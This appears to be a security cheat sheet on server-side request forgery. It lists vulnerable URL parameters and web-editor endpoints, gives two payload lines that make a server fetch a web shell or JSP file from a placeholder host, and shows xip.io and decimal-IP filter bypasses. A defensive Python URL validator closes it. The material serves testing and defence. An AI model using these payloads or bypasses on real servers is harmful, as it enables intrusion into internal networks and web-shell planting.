SSRF-related fields in URLs

relativePath
url
site
path
message=[img]http://myserver/wshell.php?logo.jpg[/img]
query
src
src_url
sr
id
vtTopicId //ebs
operator(weblogic:SearchPublicRegistries)
inputFile
column_url
preview
sIconUrl/sUrl
picPath
qrcodeUrl
fileName
upfile(ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg)
img
source
pageurl
redirect
Ueditor imageUp.jsp controller.php getRemoteImage.jsp source[] upfile
ewebeditr eWebEditor_UploadText
xheditor saveremoteimg
proxy?s=
view_img.php imgurl
link
href
apiurl
resourceUrl

SSRF bypasses:
http://10.13.199.124.xip.io:8080
www.127.0.0.1.xip.io
http://168675196:8080
The IP address can be converted to decimal to bypass filters.
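An added example, not part of the original notes: a server-side check for URLs received in parameters like those listed, which rejects the bypass forms above because it decides on the address the host maps to rather than on the host string. Wildcard DNS names such as those under xip.io resolve to the IP embedded in the name, and 168675196 is the integer form of 10.13.199.124. The names `is_fetch_allowed`, `parse_ip_literal`, `sample_resolver` and the `SAMPLE_DNS` answers are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers standing in for a wildcard DNS service (assumption),
# so the example runs offline.
SAMPLE_DNS = {
    "10.13.199.124.xip.io": {"10.13.199.124"},
    "www.127.0.0.1.xip.io": {"127.0.0.1"},
    "public.example": {"8.8.8.8"},
}

def sample_resolver(host):
    """Offline resolver over SAMPLE_DNS; unknown names fail like a DNS error."""
    if host not in SAMPLE_DNS:
        raise OSError("unknown host")
    return SAMPLE_DNS[host]

def system_resolver(host):
    """Resolve a hostname to all of its addresses with the system resolver."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def parse_ip_literal(host):
    """Return an address object for dotted, IPv6 or integer IP literals, else None."""
    try:
        if host.isdigit():  # integer form, e.g. "168675196"
            return ipaddress.IPv4Address(int(host))
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def is_fetch_allowed(url, resolver=system_resolver):
    """Allow a server-side fetch only if every address of the host is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    literal = parse_ip_literal(parts.hostname)
    if literal is not None:
        addresses = [literal]
    else:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
        except (OSError, ValueError):
            return False  # unresolvable or malformed answer: refuse the fetch
    # is_global is False for loopback, RFC 1918, link-local and reserved ranges
    return bool(addresses) and all(a.is_global for a in addresses)
```

The fetch itself should connect to the address that was validated, and each redirect target needs the same check, otherwise a second DNS lookup or a 302 response can still point the request at an internal host.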